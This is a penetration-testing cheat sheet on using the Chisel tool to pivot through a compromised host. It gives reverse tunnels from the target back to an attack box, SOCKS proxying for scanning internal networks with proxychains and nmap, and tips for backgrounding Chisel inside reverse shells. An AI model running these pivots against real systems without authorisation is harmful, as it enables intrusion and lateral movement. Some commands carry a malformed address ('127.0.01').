Port Forwarding with Chisel
Usage
Requires a copy of the Chisel binary on:
- The target host
- The attacker's host
- Download from the Releases Page
Bash Function to Download Chisel Binaries
I've added this function to my ~/.zshrc file so that I can just invoke the function at any time to download the Linux and Windows chisel binaries.
Show / Hide Code Block
function download_chisel() {
# Use the "latest" slug to always grab the newest stable release
latest_release_url='https://github.com/jpillora/chisel/releases/latest'
# Get the base URL of the latest stable tagged version
# Remove any trailing spaces
latest_stable_url=$(curl -sI "$latest_release_url" | grep location | awk -v FS=' ' '{print $2}' | sed -E 's/\s{1,}$//g')
# Use the tagged release URL and swap out `tag` for `download` in the URL
download_base_url=$(echo -n "$latest_stable_url" | sed 's/tag/download/g')
# Remove the 'v' from the version number for use in the binary name
binary_version=$(echo "$latest_stable_url" | rev | cut -d '/' -f 1 | rev | tr -d 'v')
linux_binary_name="chisel_${binary_version}_linux_amd64.gz"
linux32_binary_name="chisel_${binary_version}_linux_386.gz"
windows_binary_name="chisel_${binary_version}_windows_amd64.zip"
windows32_binary_name="chisel_${binary_version}_windows_386.zip"
linux_output_name='chisel.gz'
linux32_output_name='chisel32.gz'
windows_output_name='chisel.exe.zip'
windows32_output_name='chisel32.exe.zip'
linux_download_url="${download_base_url}/${linux_binary_name}"
linux32_download_url="${download_base_url}/${linux32_binary_name}"
windows_download_url="${download_base_url}/${windows_binary_name}"
windows32_download_url="${download_base_url}/${windows32_binary_name}"
# Download, extract, set mode
curl -sL $linux_download_url -o "$PWD/${linux_output_name}"
curl -sL $linux32_download_url -o "$PWD/${linux32_output_name}"
curl -sL $windows_download_url -o "$PWD/${windows_output_name}"
curl -sL $windows32_download_url -o "$PWD/${windows32_output_name}"
gunzip $linux_output_name > /dev/null
gunzip $linux32_output_name > /dev/null
unzip -p $windows_output_name > chisel.exe
unzip -p $windows32_output_name > chisel32.exe
chmod u+x ./chisel > /dev/null
echo "Linux and Windows chisel binaries downloaded and unarchived in $PWD"
}
Latest = 1.11.3
Example Commands
Chisel also supports authenticated proxies to prevent unwanted connections
Individual Port Forwarding
NOTE: If you plan on running the chisel server on the target, ensure the traffic is allowed through any firewalls. In general, running the chisel server on the attack box is a safer bet
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | ===============>> | | |
| chisel client | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel server |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443Chisel Server on Target
- Chisel server is listening on
TCP/51234 - Make sure this port is open in the firewall
/tmp/chisel server --socks5 --port 51234 Chisel Client on Attack Box
- Example shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443Example command
.\chisel.exe client target-box-ip:51234 127.0.0.1:8001:127.0.0.1:8001 127.0.0.1:8443:127.0.01:8443
^ ^
| |____attack-ip:attack-port:target-ip:target-port
|
|________attack-ip:attack-port:target-ip:target-portSyntax explanation
Reverse Individual Port Forwarding
- A service on a compromised host is listening on
127.0.0.1 - Run the Chisel server on the attack box in reverse mode and connect from the target
- Specify one or many reverse port forwards on the client
- Open a port on attack box and forward traffic to remote port
Network Diagram
SCENARIO
--------
Services on TARGET BOX is listening internally on 127.0.0.1 on TCP port 8001 and TCP port 8443
Run a CHISEL SERVER ON ATTACK BOX and connect to it using a CHISEL CLIENT ON TARGET BOX
Open 127.0.0.1:8001 on attack box and port forward to 127.0.0.1:8001 on target
Open 127.0.0.1:8443 on attack box and port forward to 127.0.0.1:8443 on target
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | | |
| ATTACK BOX | ___________________________________ | TARGET BOX |
| | | <<=============== | | |
| chisel server | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | chisel client |
| | | |___________________________________| | | |
'---------------' | | '---------------'
| |
127.0.0.1:8001 --| |--127.0.0.1:8001
127.0.0.1:8443 --' '--127.0.0.1:8443Chisel Server on Attack Box
./chisel server --reverse --port 51234Chisel Client on Target
- Example command shows multiple port forwards
- You can specify one or many port forwards
- Add or remove port forward declarations as needed
/tmp/chisel client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443Example command
.\chisel.exe client attack-box-ip:51234 R:8001:127.0.0.1:8001 R:8443:127.0.01:8443
^ ^
| |___ attack-ip:attack-port:target-ip:target-port
|
|___ attack-ip:attack-port:target-ip:target-port
# "R" is shorthand for "127.0.0.1"
# Effectively, listen on 127.0.0.1 on attack boxSyntax explanation
Forward Dynamic SOCKS Proxy
- Run the Chisel server on the target box
- Use the target box as a jump host to reach additional targets routable by the target
- The traffic flows forward to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | ===============>> | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel client | | |___________________________________| | chisel server | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080Chisel Server on Target
- Chisel server is listening on TCP port 51234
- Make sure this port is open in the firewall
.\chisel.exe server --socks5 --port 51234 Chisel Client on Attack Box
/tmp/chisel client target-box-ip:51234 50080:socksExample command: Open TCP/50080 as the SOCKS5 proxy port on attack box
/tmp/chisel client target-box-ip:51234 50080:socks
^
|____attack-port:socksSyntax explanation
Reverse Dynamic SOCKS Proxy
- Run the Chisel server on the attack box in reverse mode
- Connect to the Chisel server from the target and specify a reverse port forward
- The traffic flows through the port on the attack box in reverse to the target box, which acts as a transparent SOCKS proxy
SOCKS operates at layer 4 and up on the OSI model. Ping -- or ICMP -- is a layer 3 protocol and does not flow over SOCKS. So, you cannot ping targets through a SOCKS proxy.
Network Diagram
SCENARIO
--------
You have landed on a target that has access to ADDITIONAL TARGET(s) and/or ADDITIONAL ROUTE(s)
Run a CHISEL SERVER ON TARGET BOX and connect to it using a CHISEL CLIENT ON ATTACK BOX
Open 127.0.0.1:50080 on attack box and use this TCP connection as a SOCKS5 proxy
All traffic flowing through the SOCKS5 proxy will be routed by TARGET BOX to any specified destination
CHISEL CLIENT and CHISEL SERVER establish a TCP session using HTTP web sockets
The port forwarding is secured between the two using SSH tunnels flowing through the web sockets
.---------------. .---------------.
| | ___________________________________ | | .----. .----.
| ATTACK BOX | | <<=============== | | TARGET BOX | <<===================>> | | .----. | |
| | ,=====[SSH TUNNEL]=====| [HTTP WEB SOCKET] |=====[SSH TUNNEL]=====>> | | -----SOCKS5 PROXY-----> '----' | | '----'
| chisel server | | |___________________________________| | chisel client | <<========:|:========>> .----. '----' .----.
| | | | | |'| | | | |
'---------------' | '---------------' |'| '----' '----'
| |'| ADDITIONAL TARGETS
127.0.0.1:50080--' =========== '| OR NETWORKS
127.0.0.1:8080 <------------'|
============='
"socks5 127.0.0.1 50080" in proxychains4.conf
proxychains -q nmap -Pn -sT --top-ports 500 <target(s)>
curl --proxy "socks5://127.0.0.1:50080" http://127.0.0.1:8080Chisel Server on Attack Box
/tmp/chisel server --reverse --port 51234Chisel Client on Target
.\chisel.exe client attack-box-ip:51234 R:50080:socksExample command: Open TCP/50080 as the SOCKS5 proxy port on attack box
.\chisel.exe client attack-box-ip:51234 R:50080:socks
^
|___ R:attack-port:socks
"R" is shorthand for "127.0.0.1"
Effectively, listen on 127.0.0.1 on attack boxSyntax explanation
Proxychains
proxychains is used for dynamic port scanning when using Forward or Reverse Dynamic SOCKS Proxy
sudo nano /etc/proxychains4.confIn the example below, this assumes you've used tcp/50080 as the SOCKS5 proxy port (as shown in the example command above). We must specify socks5 in the [ProxyList] section, as this is the protocol supported by Chisel.
[ProxyList]
socks5 127.0.0.1 50080Port Scanning via SOCKS Proxy
With SOCKS, you must use the -sT flag to make a full TCP connection through the proxy. The SOCKS proxy cannot track TCP states when -sS or half-open scans are used.
Scanning 127.0.0.1 -- in this case -- causes the traffic to flow through the SOCKS session, come out the other side of the proxy on the target and effectively scan the loopback adapter on the target side.
# TCP connect scans are brutally slow, use top 1,000 ports
sudo proxychains -q nmap -Pn -sT --top-ports 1000 -T4 -sC -sV 127.0.0.1Reverse Shell Tips
Run Chisel in the Background
Running chisel in the foreground in a reverse shell will render your shell useless, adding these notes here as a way to work around this.
Linux
Client Mode
chisel client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 &Background a process with &
Server Mode
chisel server --port 8080 --reverse &Background a process with &
Windows
PowerShell
Client Mode
$scriptBlock = { C:\Windows\Temp\chisel.exe client 10.0.0.2:8080 R:127.0.0.1:33060:127.0.0.1:3306 R:127.0.0.1:8800:127.0.0.1:80 }Start-Job -ScriptBlock $scriptBlockStore a PowerShell scriptblock in the $scriptBlock variable and run in the background with Start-Job
Server Mode
Note that in server mode, you'll need to make sure your port is allowed through the firewall.
$scriptBlock = { C:\Windows\Temp\chisel.exe server --port 50001 --socks5 }Start-Job -ScriptBlock $scriptBlockStore a PowerShell scriptblock in the $scriptBlock variable and run in the background with Start-Job